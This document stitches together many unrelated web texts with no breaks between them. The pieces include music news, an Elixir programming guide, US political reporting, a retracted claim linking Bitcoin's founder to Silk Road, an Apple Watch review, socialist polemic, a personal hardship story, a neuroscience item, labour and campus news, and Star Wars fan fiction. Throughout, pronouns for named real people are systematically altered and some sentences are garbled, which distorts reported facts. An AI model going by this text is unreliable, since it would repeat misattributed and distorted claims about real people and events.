Last week, a Tribe Called Quest released their final album, We got it from Here... Thank You 4 Your service. Now, in a new interview with Billboard, Q-Tip has revealed plans for one final world tour. “This is our last record, and we'll probably do a world tour,” they said. “After that, that's it, for the rest of our lives.” Elsewhere in the interview, Tip and Jarobi White reflected on the loss of Phife Dawg, and Tip also shared their thoughts on President-elect Donald Trump. They said:
He's somebody who's never held political office.He's never been, like, an assistant coach on a softball team! I guess you could argue that it shows you can be anything you want if you dream big, but you'd be hard-pressed to find someone who would argue that. And that's before you even get to the homophobic, racist, sexist, myopic principles they ran on.
Read the full interview here. Tip and White recently performed on “Saturday Night Live.” Soon, Tribe will release the music video for We got it from Here... highlight “We the People...”–a song that already has a lyric video.
Read “Why a Tribe Called Quest's Phife Dawg Was Sports Fans' Favorite Rapper” on the Pitch.
So you have been studying and playing with Elixir for quite a while, and you are pretty well-versed with the basics. There comes a point in time when you start to ask:
What projects can I work on to learn more about Elixir?
I have asked others on the Elixir Talk Google group a similar question. The responses are great, and well worth a look. I guess the main reason for this is a lot of developers (including yours truly) coming to Elixir have little experience programming concurrent, not to mention, distributed applications. Therefore, they have little experience to draw on.
So what's a beginner Elixir developer to do?
Step 0: Do the Chat example
Everybody will start with “Do the chat example”. So do it, then move along to Step 1.
Step 1: Learn to convert Erlang to Elixir
The first thing to do is learn how to convert Erlang code to Elixir. For this, the official docs are very useful. Along the way, you might even start to appreciate Elixir even more. This is important because learning how to read Erlang code opens up the entire ecosystem. Believe me, it is not hard, 80% of the time. The rest of the 20%, there's always the Google group, IRC and Stack Overflow.
Step 2: Read Erlang books
Get you hands on as many Erlang books as you can. Here's a list:
All these books have nice example programs/exercises that can be ported over to Elixir with some effort. Even better, you can also convert the examples and exercises and put them up on a git repository to help other beginners. The last book in the list for example, walks you through building a reliable, distributed, key-value store.
Step 3: Port existing Erlang programs
There's a wealth of interesting Erlang programs out there. I'm not saying you should port Riak, but something like Poolboy (self described as a hunky pool factory) or even a redis client such as eredis.
Step 4: Keep having a Beginner's mind
If your mind is empty, it is always ready for anything, it is open to everything. In the beginner's mind there are many possibilities, but in the expert's mind there are few. ― Shunryu Suzuki
Being a beginner is a precious state to be in. Celebrate and treasure it, because it is far to easy to slip into complacency.
Thanks for reading!
WASHINGTON — The Justice Department has opened a criminal investigation into a California member of congress who faces allegations that they spent tens of thousands of dollars in campaign funds on family trips to Hawaii and Italy, private school tuition and dance competitions for their children, and even video games, officials disclosed Thursday.
Representative Duncan D. Hunter, a Republican from San Diego who was considered for several top national security posts in President Trump's administration, became the latest in a string of at least eight current or former members of Congress to face criminal investigations over ethics issues in the last several years.
A five-term member of congress, Mr. Hunter has already paid back $60,000 to their political campaign to correct what they said were mistaken payments for personal items.
But that has not cleared them of scrutiny.
The House Ethics Committee, which has been examining Mr. Hunter's possible misuse of campaign funds, said in a statement on Thursday that it would put its review on hold at the request of the Justice Department.
UPDATE: The researchers have retracted their claim, click here to read the story »
The two most important moments in the history of Bitcoin are its creation, and the founding of illicit goods and services site Silk Road, which created the first ever market for the digital currency.
Now, two Israeli mathematicians, Dorit Ron and Adi Shamir of the Weizzman Institute south of Tel Aviv, write in a new paper (first reported on by John Markoff at Bits) that they've found a "very surprising connection" between the individual or individuals behind the first and the individual allegedly behind the second.
In October, the FBI arrested San Francisco resident Ross Ulbricht, accusing them of being Dread Pirate Roberts, the hacker handle of the guy who ran Silk Road. They seized their laptop, shuttered Silk Road, and after considerable effort — 25 days — they took control of all 144,336 of Ulbricht's Bitcoins, which would now be worth more than $115 million, and transferred them into FBI-controlled accounts.
Upon doing so, the agency gave anyone a way to trace the history of Ulbricht's Bitcoin wealth. Although both parties in a Bitcoin transaction are anonymous, the details of all transactions — the address of the buyer and seller, the quantity, and the date — are publicly known, chronicled in a master ledger which can be found here or here (the researchers used the former). So if you can match a given amount with a given personality, it's possible to excavate the entirety of that person's Bitcoin banking records. Given the quantities seized, it was immediately obvious which Bitcoins had belonged to Ulbricht, though the FBI publicly released the address of the seized funds account anyway.
Out of curiosity, Ron and Shamir traced the history of every transaction executed by addresses connected to the Bitcoins seized by the FBI. Eventually they made a surprising discovery: on March 20 of this year, an Ulbricht-controlled account received 1,000 Bitcoins from an account created on Jan. 16, 2009 — just one week after the first-ever Bitcoins were mined. That account accumulated over 77,600 BTCs, mostly through mining, until 2011, when it began shooting off its balance into separate accounts, as illustrated here.
Ron/Shamir
Such a transaction is unusual, they explain:
"Such a single large transfer does not represent the typical behaviour of a buyer who opens an account on Silk Road in order to purchase some narcotics (such buyers are expected to make an initial deposit of tens or hundreds of dollars, and to top the account off whenever they buy additional merchandise). It could represent either large scale activity on Silk Road, or some form of investment or partnership, but this is pure speculation.
Instead, it may be evidence of something more profound:
"The short path we found (which is depicted in Figure 6) suggests (but does not prove) the existence of a surprising link between the two mysterious figures of the Bitcoin community, Satoshi Nakamoto and DPR. It is reasonable to assume that all the accounts described along the top of Figure 6 belong to the same person, but to be on the safe side we refer to them as a "Founder" rather than as Satoshi Nakamoto. We are sure that analyzing this figure will start a very vigorous debate in the Bitcoin community."
Bitcoin aficionados themselves like to play down the importance of knowing the identity of Satoshi, heralding him/her/them as more of a benevolent specter who created a universe and whose true identity is immaterial to that world's success.
But given that Bitcoins are now worth $800 and rising — and assuming that Satoshi owns or owned a lot of them (some suggest they have 1 million), many still wonder whether a secret multi-millionaire now stalks the land.
Meanwhile, for the latest in everything we know about Satoshi Nakamoto, check out this chart from Chartgirl.com.
‘What does it do?' That's the question that anyone who cares about the Apple Watch wants answered.
There are a host of answers, and while I've not yet found one that's utterly compelling, this is by far the best smartwatch I've used. It's the first where I've consciously really wanted to make sure I'm always wearing it and that the battery doesn't run out.
Designed for life?
First off, like all good watches, the Apple Watch is a luxurious, even beautiful fashion accessory. I've spent a week wearing the £599 42mm, stainless steel model with a light brown leather loop band. From the clever magnetic strap to its understated design, it has attracted attention for all the right reasons.
At £299, or even £13,500, it is by no means as expensive as others on the market.
For me, it more than passes the fashion test. I've not encountered anyone who couldn't find a strap and watch combination they genuinely liked, although few have actually had the chance to wear one in real life. I surprised myself by wanting to change straps depending on the social setting or, for instance, using a rubber sport band for exercise.
> > Apple Watch: the Fashion verdict
Set-up and customisation, via the Apple Watch app, is straightforward enough, and it's where the Watch starts to get smart that it becomes more interesting.
Speaking as someone who doesn't normally wear a watch, that's crucial for Apple to make this work.
For a start, the face, which only lights up when it detects you've moved your wrist, is almost infinitely customisable. You can have Mickey Mouse tapping their foot to the time, a graphical display of sunrise and sunset, the moon and the planets or a vast array of typical ‘complications' showing the time in other zones, your next meeting, how many calories you've burned or plenty of other options. It's not novel, but as is so often the way with Apple it takes existing functions and does them better. All this is accessed simply by pressing - ‘force touching' - a single finger on the time display.
A filter for your phone
There are countless things beyond telling the time that the Watch can also do - but I found that if it was used for every app and message, it became an irritating blizzard of notifications that I quickly started to ignore altogether.
Apple stresses that the Watch is a ‘new way to interact with important, timely information' - that means there's never an excuse to miss a phone call again, thanks to the haptic - aka discretely buzzy - sensation on your wrist.
It's also easy to select the option to answer a call on your iPhone rather than have an awkward speakerphone chat with your wrist. If you look at your Watch immediately after a notification, it shows it to you automatically, and if you hold it for longer it shows more detail. Look at the Watch any other time and you just get the time.
Apps will notify you only of the most important things, if you permit them. The Watch is a filter for your phone, freeing you from the compulsive checking to see if anything new has happened.
When it comes to text messages, for instance, you can instantly reply via Siri or with a set of intelligent, contextually aware phrases. With so few other Watch wearers while I was testing, it was hard to use the options to tap people on the wrist or to send them pictures or even my heartbeat; but while these ‘Digital Touches' do feel like gimmicks they are also gimmicks with real, practical uses.
When the Watch is on your wrist, swiping up from the bottom takes you to a set of glances, such as most recent apps, stock prices, the weather and more. It's an area that feels like it will expand as time goes on and again saves using the phone itself. With the Music app you can control what's playing on your phone or via speakers.
Interface, apps and battery life
Throughout all of this, the Apple Watch interface is a mixture of using the ‘digital crown' dial to zoom in and out on a screen that is too small to pinch and zoom, and using it as a back button. The side button brings up contacts.
This sounds complicated, and it does feel complicated initially. I've got used to it, but I still occasionally feel there is one button press too many. If the display isn't on, for instance, it takes two clicks of the crown to get the device to turn on then move from watchface to apps. It's hard to see how to do it better, but its imperfect nonetheless.
Displayed as a kind of cloud, the apps themselves are surprisingly easy to find.
>> Apple Watch: The best apps
They seldom, however, felt properly developed. When using Hailo I always ended up then using my phone to see precisely where a cab actually was. When using directions, I liked to see the map. A recipe app was simply a tiny-screen version of the tablet option, inaccessible with hands greasy from cooking.
But using the Watch as a remote control for your iPhone camera or Apple TV, or to display a boarding pass QR code, which automatically stays on, is clever and feels like progress.
Even using the Watch intensively, it never struggled to last a whole day, and once made two full days, just.
Health and fitness
For me, it was only in health and fitness that the Watch came into its own.
A set of three rings track how much exercise you've done, how many calories you've burned and how much you've stood, as measured against your own goals. The aim each day is to make each ring come full circle each day. You can look at the data via your Watch or in more detail on your phone. Although it's disconcerting that the Watch prompts you to stand while also giving you driving directions, it does, in appropriate situations, make a real difference.
A ‘force touch' can start or stop a workout, which can be tailored to rowing, running, walking or a host of other options. Paired with an iPhone the Watch can use GPS to track a route, or without it will do distance and play music via bluetooth headphones. If you achieve your goals, Apple gives you worthless but irrationally satisfying digital rewards.
Is it worth it?
I'm quite a fan of Android watches. Google Now tells you when to leave so you don't miss appointments, for instance, and is arguably more useful in many ways than the Apple Watch.
But some older Nokias did more than the original iPhone. Because they failed to adequately combine form and function, nobody really cared.
So with the Apple Watch, again, existing functions are rethought and combined in a new and uniquely appealing way.
That's not, however, to say that even Apple fans with £299 burning a hole in their pocket should rush out and buy this first generation Watch. It's beautifully designed and frequently rather useful - but history suggests version two or three will be even better.
The Apple Watch is priced between £299 - £13,500
Australian pseudo-left group hails Syriza's victory in Greece
By James Cogan
29 January 2015
The Australian organisation Socialist Alternative (SA) is among the pseudo-left tendencies internationally rushing to laud the outcome of the Greek election. As in Europe and elsewhere, SA is seeking to cover up the profound dangers to the working class contained in Syriza's victory, and its formation of a coalition government with the extreme right-wing nationalist Independent Greeks.
As the WSWS Perspective warned on January 27: “Syriza's election victory does not express a political development, a step forward, progress or anything of the kind by or for the working class. In its origin, social composition and politics, Syriza is a bourgeois party—one of many, including the Democrats under US President Barack Obama—that come to power making promises of ‘hope' and ‘change' and then impose policies of austerity and war. It will inevitably betray, sooner rather than later, the aspirations for an end to social hardship and suffering that it has cynically exploited.”
The response of SA is diametrically opposed. On January 26, SA's publication RedFlag hailed the election as a “stunning victory of the left in Greece.” It declared Syriza was committed to “a series of decisive reforms” that represented a “direct challenge to the neoliberal agenda that has dominated Western capitalism over the last 30 years.”
SA asserted: “If Syriza does not back down and pushes ahead with its anti-austerity program, that will raise hopes and aspirations throughout Europe and could trigger a sharp swing to the left.”
SA's enthusiasm stems from its years of lies and falsifications to promote illusions in Syriza and present it as a model for new “left” formations internationally, including in Australia. SA's Greek co-thinker, the Internationalist Workers Left (DEA), is part of Syriza and its Left Platform faction. Some of the DEA's leading members sit on Syriza's Central Committee.
SA has done everything it can to support the DEA's assertions that Syriza, headed by Alexis Tsipras, could be pressured to the left by self-styled socialists and “revolutionaries” working within this bourgeois formation. SA conferences featured DEA speakers, while RedFlag published glowing endorsements of their activities in Syriza.
The real political role of the DEA and Left Platform has to been to assist the Syriza leadership confine resistance to austerity to impotent general strikes and rallies. The revolutionary potential of the opposition of Greek workers has been blocked and the working class channelled behind the delusion that the assault on its living standards can be reversed by electing a Syriza-led capitalist government.
Syriza's decision to ally with the anti-immigrant, pro-church, oligarch-linked and ultra-nationalist Independent Greeks is a damning indictment of the DEA and Left Platform, as well as SA and the entire international pseudo-left milieu. Syriza is committed to the defence of the Greek capitalist state and capitalist property. The choice of the far-right as its partner signals that it will not hesitate to use state violence against opposition from the very workers who voted for Syriza. That is underscored by the fact that the Independent Greeks leader Panos Kammenos has been installed as defence minister. They have close links with the military—that is, the same military that ruled Greece between 1967 and 1974 with an iron fist.
On January 27, DEA leader and Syriza Central Committee member Stathis Kouvelakis asserted that the participation of “even one minister” from the Independent Greeks in a Syriza government would “symbolise the end of the idea of an ‘anti-austerity government of the left'.” They noted that the Independent Greeks were primarily concerned with protecting the “hard core” of the state apparatus, meaning the military and police. They concluded that, for Syriza, “there is no middle course between confrontation and capitulation” and “the moment of truth is at hand.”
The moment did not even last 24 hours. Yesterday, January 28, the DEA spelt out its own capitulation to Syriza's coalition with the Independent Greeks. Making clear it will remain in Syriza and serve its reactionary leadership and program, the DEA stated: “In these new circumstances, the role of Syriza as a political party is irreplaceable. The functioning of its organisational bodies and membership, with collective participation and democracy throughout the party, is not an optional extra, but the precondition for the final victory of Syriza, and the final victory of the whole of the left and of our people.” By declaring that Syriza is “irreplaceable,” the DEA makes it plain that there is no line it will not cross in supporting this bourgeois government.
The DEA's assertions that the working class must be confined to seeking to influence Syriza, poses immense dangers. Time and time again, most recently in Egypt, claims by fake socialists that “left” bourgeois governments could be pressured to implement social and democratic reforms have served only to politically disorientate the masses and provide the ruling class with time to prepare mass repression and dictatorial forms of rule. Strategic experiences in country after country have proven that without a genuine Marxist party, fighting for international socialism and the complete political independence of the working class from all factions of the bourgeoisie, the working class will be defeated.
SA and RedFlag are preparing to play a similarly treacherous role in Australia. For the past several years, SA has devoted much of its energies to trying to assemble a so-called unified “left” that could enter into an Australian version of Syriza. At a conference last April, during a joint seminar with a DEA leader, SA National Committee member Mick Armstrong declared: “[W]here opportunities open up we have to seize them… There is nothing like Syriza on the agenda in Australia today, but at some stage that will open up as a possibility, at some stage, things will move.”
Any move by elements of the Labor Party or the trade union apparatus to corral political opposition in the working class behind some self-proclaimed new “left” party in Australia would find enthusiastic collaborators in SA. Under conditions of mass alienation from both Labor and the traditional big-business Liberal Party, the prospect is not far-fetched. As the global and domestic economic situation deteriorates and the dangers of war grow in the Asia-Pacific as a result of the Australian-backed US pivot against China, politics is becoming increasingly fraught. Already, divisions in ruling circles and broader social antagonisms have seen a range of right-wing, populist formations established, such as the Palmer United Party.
In Greece, SA's counterpart, the DEA, is directly complicit in the subordination of the working class to Syriza. SA's protracted promotion of the DEA's entry into Syriza is part of its preparations to perform the same service in defence of the Australian capitalist state.
Please enable JavaScript to view the comments powered by Disqus.
Special counsel Robert Mueller Robert Swan MuellerSasse: US should applaud choice of Mueller to lead Russia probe MORE and their team are looking to determine how much President Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say they should get less than 10 years in prison MORE knew about their campaign members' contacts with Russian officials and representatives — if anything — during the 2016 race.
Investigators on Mueller's team have questioned Sam Clovis, the co-chairperson of Trump's campaign, to determine what Trump knew during the campaign and subsequent presidential transition, Reuters reported Saturday.
“The ultimate question Mueller is after is whether candidate Trump and then President-elect Trump knew of the discussions going on with Russia, and who approved or even directed them,” one source told Reuters. “That is still just a question.”
ADVERTISEMENT
Clovis, who currently serves as the senior White House adviser to the Agriculture Department, has already testified before the grand jury for Mueller's probe, and is said to be "cooperative" in the Senate Intelligence Committee's investigation into Russian interference in the 2016 election.
Clovis has garnered attention in the probes after it was revealed that a former foreign policy adviser to the campaign, George PapadopoulosGeorge Demetrios PapadopoulosThe Memo: Mueller report won't end Trump's legal woes White House braces for Mueller report Justice Department preparing for Mueller report as soon as next week: reports MORE, told them last year about their connections with Russian representatives that could arrange a meeting between then-candidate Trump and Russian President Vladimir Putin.
At the time, Clovis told Papadopoulos that they would "work it through the campaign," but praised their "great work."
Papadopoulos has pleaded guilty to lying to FBI agents about their contacts with Russians while they were working for Trump's campaign.
Mueller is conducting a criminal investigation into Russia's interference in the 2016 election. In particular, he's looking into whether members of Trump's campaign coordinated with Russian government representatives or operatives.
Trump has repeatedly denied collusion between their campaign and Moscow, and has called Mueller's investigation a "witch hunt."
It was revealed in court documents made public last week that Papadopoulos told campaign officials during a March 2016 meeting attended by Trump that they had connections with Russians that could help arrange a meeting between the Republican presidential candidate and Putin.
My finances don't compare to some of these listed but it still stings.
I built a computer repair business after 10 years Aged 21 to 31 I managed to build it to 3 sites and 10 staff and I amassed my goal ($1 Million in Assets) obviously I had bigger plans but things turned. I lived pretty large but I worked for it, I had 20 days of leave over 10 years my body was bust. The GFC came and smashed me again and then a franchise I had joined shut the doors on us.
So we decided it was time to get out, We sold it for half what we advertised it for and would get just enough money to break even.
I was ripped off by the purchaser and lost everything. I was forced through bankruptcy and to remain in town (a small country town where we wanted to raise our children) I had to take up work at a local mill aswell as 4 other part time jobs.
Physically i'm broken, my back and other ligaments are shot, I cant sleep because of the pain and It's now been two years and I'm just about to finish at the mill and start fitting tyres.
I would like to say that everything's rose'y but I worked my arse off till I broke and now I've lost everything, my house, Car's, other assets. Now I cant even get a loan.
One day i'll find that juice again and maybe things will improve but all I do now is work to pay the bills.
I still have my great kids and wife but I work everyday to keep them.
The first time I saw a Herculoids cartoon, I thought that they were the coolest thing I'd ever seen. I LOVED the alien creatures, and wanted to ride on both Tundro and Zok. Gloop & Gleep made me laugh, and I thought that Igoo could beat up anyone. I didn't really care about the humanoid family at first, because they looked so normal and I wanted strange-looking things! But I was quite jealous of any family who could live on an alien planet with such awesome creatures! Anyway, I've been wanting a Herculoids commission for a long time and have actually brought up the idea with a few different artists, but Nate was the first one I actually pulled the trigger with. Nate had a very deprived childhood apparently, because they had never seen a Herculoids cartoon before. I sent them reference images of the Herculoids and told them to hit YouTube in search of some of the classic episodes. I feel that Nate captured the characters perfectly on their first attempt and think that the team has never looked better! The creatures look intimidating and even Dorno looks like he's gonna put a hurting on someone. Anyway, I love this deeply and will be showing it off for years to come. Thanks again, Nate!
If you like this piece, then by all means go buy some of Nate's comics and/or commission them yourself.
This page is part of Section One:
the Your Dog section of barkingdogs.net
Cult of Personality isn't just a great song by the 1980s band Living Colour- it's also one of the cornerstones of Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say they should get less than 10 years in prison MORE's campaign, even if we haven't necessarily grasped its magnitude just yet. For those not familiar with the phrase, it was widely popularized during the Cold War to describe the USSR's propaganda methods which were aimed at fostering an uncritical and adoring following around any given leader's personality rather than their regime, downplaying and even assassinating political rivals in the process.
The most extreme contemporary example of this propaganda-machine would be North Korea and its former and current dictators. The country's current leader, Kim Jung-un, replicates their father and grandfather with a style of government that primarily revolves around the totalitarian leader. The ranks of historical figures and leaders who have used this technique include the likes of Adolf Hitler, Benito Mussolini and Ho Chi Minh, the former Communist Prime Minister of Vietnam and an egregious violator of human rights. The practice of this form of propaganda mainly involves: erecting monuments that invoke confidence in the leader depicted, imposing strict control on media and the way journalists speak about their country's leader, denying responsibility for everything bad to befall the country and taking sole responsibility for anything good. Putting the pieces together yet?
Trump's campaign is a weaker and less effective modern iteration of the archaic, Soviet-era propaganda machine. To suggest Trump is a Manchurian candidate is outlandish, but to write off their well-documented economic and social ties to Russia is arguably even more outlandish. But what frightens me most concerning Trump isn't what he's taking from Russia in terms of money, but rather, in ideology.
A closer look at Trump's campaign quickly reveals the parallels between them and a totalitarian leader working to advance their cult of personality. To a close observer, it may seem their tirades on Twitter (3:00 AM EST, 12:00 AM Pacific) show a deeply troubled man with self-esteem issues that is “baited by a tweet”. But to the general public, Trump is a success. They have built gargantuan real estate projects that all brandish their name in bold, golden letters.
Trump flies around in their jet that they feel it was necessary to put their name on. They talk about how “he is the only one who can fix everything” and proudly proclaims that them — a business person with a very mixed record — knows more than our own generals with years of experience and intel. Trump's towers and jet are just a few of their personal monuments that have given the public a falsely-based reason to trust they know what he's doing. Their unflappable denial and pandering show someone who is committed to no real issue other than the self-interest and power. They refuse to acknowledge, apologize, or make amends for any of the mistakes and outrageous claims they have made. He's said multiple times that cable news networks are against them and that once they were president they would do something about the way the media can behave. Their plans are smoke and mirrors, yet when their supporters are confronted with these realities, no matter how credible, they simply dismiss them in favor of their personality.
While we've seen the rise and fall of multiple fascist leaders over the last century, none of us thought a candidate from our very own country would present such a clear and present danger. This is not a popularity contest, this is a Presidential election- if you want to justify your vote by looking towards a candidate's personality rather than their policies, scandals, and blatant lies, then don't cry when this election is over, and you've realized that maybe, the jokes gone too far.
Diccicco is a precinct leader for the Democratic Party in South Florida. Follow them on Twitter @JordanDiccicco
The views expressed by Contributors are their own and are not the views of The Hill.
When we're young, our brains are able to form new neural connections extremely quickly - an ability known as “plasticity” that allows us to learn how to walk, talk and play all in the space of a few years. But, as we get older, this ability fades and, sadly, it takes us longer to learn new things.
Now scientists from Stanford University in the US have managed to unlock child-like plasticity in the adult brains of mice by interfering with a protein known as PirB (or LilrB2 in humans).
The breakthrough is pretty exciting as it could not only lead to new mind-enhancing drugs, but could also help us work out how to make the brain more malleable and better able to recover from damage.
PirB is a receptor that, in both mice and humans, appears to stabilise neural connections. That's useful, as it helps us store information and skills, but it also seems to stop us learning quickly.
In the experiment, a team of scientists led by neurobiologist Carla Shatz interrupted the expression of PirB in the visual cortex of mice's brains, either through genetic engineering or through a drug known as sPirB - a soluble form of PirB which floods the bloodstream and binds with all of PirB's targets before the protein gets a chance.
These mice, as well as a control group, were then forced to use just one eye - something that requires their brains to rewire in order to recover normal eyesight. In the mice that had PirB activity interrupted, the neural circuits reformed more quickly, and normal eyesight was restored much faster than in the mice whose PirB was functioning normally.
Importantly, the scientists tested the mice both during development and when they were adults - and in each state the mice with interrupted PirB function showed quicker neural rewiring.
The results are published in Science Translational Medicine, and the authors conclude that this is evidence that PirB actively represses neural plasticitiy in the visual cortex of mice - and potentially throughout the brain.
While this is a pretty exciting result, unfortunately things aren't quite so simple in humans - we actually have five different versions of the LilrB2 protein, as Neomatica reports, and scientists will now have to work out which one of those to target in order to unlock similar benefits in our brains.
And, of course, it's yet to be seen what the side effects of blocking the activity of this protein will be in humans.
But it's important research that will help us to understand more about how the brain learns, and also what causes it to slow down. LilrB2 has been linked to Alzheimer's disease in humans, and in the future a similar drug to the one tested in this experiment could potentially help people with the disease.
As for the crazy Limitless-style learning benefits it could unleash in adult humans...we'll have to wait and see.
Source: Neomatica
The path toward passage of Los Angeles' landmark minimum wage increase took a rocky detour Wednesday, as business and elected officials reacted harshly to a last-minute push by labor leaders to create an exemption for companies with unionized workforces.
Union officials have been among the most ardent backers of the plan approved by the L.A. City Council last week to raise the minimum wage to $15 an hour. But some labor leaders who opposed loopholes for small businesses and restaurants now argue that unionized companies should have leeway to negotiate lower pay rates with their employees.
The suggested addition to the wage-increase plan drew sharp criticism from some in the business community, who said it would pressure employers seeking relief from rising labor costs to strike collective bargaining agreements. Even some who fought side-by-side with union activists for the wage increase said they were uncomfortable adopting the proposed exemption without further study.
"For me, the point of the minimum wage in Los Angeles was to raise wages and lift people out of poverty," said Councilman Mike Bonin, a champion of the ordinance and frequent labor ally on the council. The pay hike should apply for "everyone," they said, including "employees of big businesses and small businesses, of nonprofits and for-profits, people who are members of unions and people who are not."
Bonin's view was at odds with that of Rusty Hicks, head of the Los Angeles County Federation of Labor and a leader of the Raise the Wage coalition. Hicks said in a statement that companies whose workers collectively bargain for a wage below the city-mandated minimum shouldn't be penalized.
They and other supporters of the exemption argue that a collective bargaining agreement should allow workers and businesses freedom to focus not only on pay but on other forms of compensation, such as retirement and health benefits. "This is a standard clause to protect basic worker rights," Hicks said in their statement .
Critics complained that labor leaders were unwilling to extend similar considerations to small-business owners, who have warned they would struggle financially to comply with the law. When the plan passed a key council committee this month, Hicks said that "it is critical that no Angeleno — whether they're workers or owners of small businesses and nonprofits — is left behind."
"It's insane hypocrisy," said restaurant owner George Abou-Daoud, who lobbied unsuccessfully for changes to the wage-increase plan. "The unions have put forth an agenda that they themselves don't have to comply with."
Language similar to that sought by Hicks was included in the $15.37 minimum wage the city approved last year for workers at large hotels. Margo Feinberg, an attorney for the local labor groups, said that if the city failed to include a waiver for unionized workers it could be more vulnerable to legal challenges under federal labor law, which guarantees private-sector employees a right to collective bargaining.
"We have no desire to undermine the ordinance," Feinberg said.
Some — but not all — cities that have established higher minimum wages in recent years provided a union worker exemption. San Francisco, Chicago and Oakland did; Seattle did not.
L.A.'s minimum wage would gradually rise from the current $9 to $15 by 2020, with a one-year delay for employers with 25 or fewer workers and for some nonprofits.
Like other aspects of the pending law, the potential effects of adding a collective-bargaining exemption are unclear.
Many employees who are now unionized might not be affected. The average hourly wage for L.A. union workers was $27.50, according to a 2014 study by the UCLA Institute for Research on Labor and Employment. Chris Tilly, director of the institute, said the exemption would most likely come into play for non-union workers who try to organize after the ordinance is passed.
Some suggest the provision sought by labor leaders is a thinly veiled effort to boost unions' membership.
"Last week it was all about pumping their fists and saying, 'No subminimum wage.' This week it's all about giving employers and employees the right for a subminimum wage. I think that's a huge contradiction," said Councilman Mitch O'Farrell, who voted for the wage increase.
"Approving the minimum wage to lift people out of poverty is one thing," they said. "The City Council becoming a vehicle for organized labor to unionize private industry is entirely something else."
The proposed exemption is the latest controversy to erupt in the final throes of a debate that has stretched over nine months of news conferences, protests, public hearings and City Council discussions. Last week, when the council voted 14 to 1 to approve the wage-increase plan, it simultaneously backtracked on an 11th-hour addition that could have forced employers to give workers as many as 12 paid days off each year.
On Friday, the council's Economic Development Committee is scheduled to take up a draft of the ordinance written by the city attorney's office. Some council members, including Bonin, say they think any exemption for unionized workers should be tabled for study so the rest of the wage ordinance can advance.
Speaking with reporters Wednesday, Mayor Eric Garcetti declined to take a position on the exemption sought by labor leaders, but said he's open to examining it.
"I think a lot of people have opinions, whether it's business or labor, or stakeholders. We'll always listen to that," Garcetti said. "But what's moving forward is something that doesn't have [a waiver for unionized workers] in it."
peter.jamison@latimes.com
The 2015 protests that rocked the University of Missouri campus and eventually led to the ouster of the school's president “has been a disaster for the university.” That's the conclusion of the NY Times which published a story yesterday on declining enrollment at Mizzou.
Before the protests, the university, fondly known as Mizzou, was experiencing steady growth and building new dormitories. Now, with budget cuts due to lost tuition and a decline in state funding, the university is temporarily closing seven dormitories and cutting more than 400 positions, including those of some nontenured faculty members, through layoffs and by leaving open jobs unfilled… Tyler Morris, a white student from St. Louis, said they were afraid of being stereotyped as a bigot if they went to Missouri. So they decided to go to Missouri Valley College, “just down the road” in Marshall. “The discrimination wasn't against white people, but I didn't want to be that person who I guess was stereotyped because I was white,” they said.
The Times' account of what happened at Mizzou is fairly good, though the description of one of the student grievances was a bit anodyne. “This was followed by the failure of the university president, Timothy M. Wolfe, to get out of their car to speak with demonstrators during the homecoming parade in October, drawing accusations of indifference,” the Times reports.
Actually, what happened was that a group of about a dozen black students got in front of the car carrying Mr. Wolfe through the parade and began hectoring them and the audience with a bullhorn. When the car tried to slowly move around the protesters, Jonathan Butler put their rear end on the hood. Thereafter, Butler claimed a protester had been hit by a car:
Y'all. @UMPrez is ok with one of their tuition paying students getting hit with a car. #ConcernedStudent1950 pic.twitter.com/79PkkklyIh — [;] (@_JonathanButler) October 13, 2015
This became one of the group's main points of outrage and one of the items mentioned in their list of demands. That oversight aside, the NY Times does mention the infamous video of Professor Melissa Click calling for “muscle” to eject a student reporter.
The protests at Mizzou and the resignation of the college president were widely celebrated as a success at the time, but things haven't worked out well for the school which is now renting out empty dorm rooms for events like the upcoming solar eclipse. It turns out students aren't eager to attend a school best known for, as the Times puts it, “a hair-trigger protest culture lacking any adult control.”
Labour admitted a previously barred activist who refers to their critics as "Zio idiots" and "Zionist scum", and claimed that Jews supported the Nuremberg laws, it has emerged.
Tony Greenstein, a prominent campaigner from Brighton, was barred from entry to the Party last summer when vetting of new applicant was stepped up during the leadership contest to prevent a surge of "entryism" from groups who did not share the "aims and values" of Labour.
However, following Jeremy Corbyn's election as leader, Mr Greenstein slipped back into the party unnoticed.
Evidence compiled by Labour's compliance unit when Mr Greenstein attempted to join the party last summer, seen by The Telegraph, included their claims in online forums Margaret Thatcher was an "obviously legitimate" target for the IRA and that "Zionists collaborated with the Nazis".
John Mann MP, chair of the Party Parliamentary Committee into Anti-Semitism said that it was "hugely inappropriate" for Mr Greenstein to have been admitted to the Party.
Year 14:3:15 after the Great ReSynchronization
In the years following the Great Clan Wars Duchess Satine's government have held to advancing the notion that their group was unified under one banner. As to who's banner, this question had become one that threatened to splinter the already fractured body of the New Mandalorians until Satine was chosen. Even still, there were some who resented the young Duchess' rule, namely those of Clan Merrik, who claimed that as one of the oldest and strongest clans on Kalevala, that they, not Satine and Clan Kryze, deserved to be the rulers of the Mandalorian people. Satine, ever the pacifist, and wanting to avoid another war, looked to appease the family of Tal Merrik the Elder and that of their wife, Clan Datt, bestowing upon the chief of Clan Merrik the title of Prince of Kalevala. The princely reign of Tal Merrik ended when they fell ill in 10 aGrS, at which time their son, Tal Merrik the Younger took on the mantle of Prince and within a year was named Mandalore's representative in the Senate.
The Duchess is all too trusting of the wrong people. If they had any sense about their she'd have eliminated this threat. As it happens, I'm dealing with it.
After Tal's failed and foolish attempt to assassinate the Duchess aboard their own ship in the company of two Jedi no less, rumors had begun of their younger brother Lon Merrik's desire for revenge. Kalis cared little for the machinations, save for when they posed the risk of interfering with their own intrigue.
"Governor Kalis, as a citizen of Concordia I am sure you understand our plight," Prince Lon Merrik said. "Those of Concordia have long since been removed from the matters of the Mandalorian state and resentment of Satine's government runs hot on this moon."
Kalis sat at the head of the table in the stateroom that housed the mural of Mandalore the Ultimate. Seated at the opposite end was the prince and to the man's left, shrouded in a black veil, was the widow of the late Tal Merrik, Ora Opel-Merrik. On either side of the table were near a dozen fellow clan members and those of Lon's mother's family, Clan Datt.
"You're telling me something I already know Prince Lon," Kalis said, leaning forward in their chair. "What I don't know is of this plight you speak. Perhaps after you've explained what it is I am sure to understand we may come to some...understanding."
"Satine's government—"
"Satine's government?" Kalis interjected. "I was under the impression it was all of yours. All you New Mandalorians."
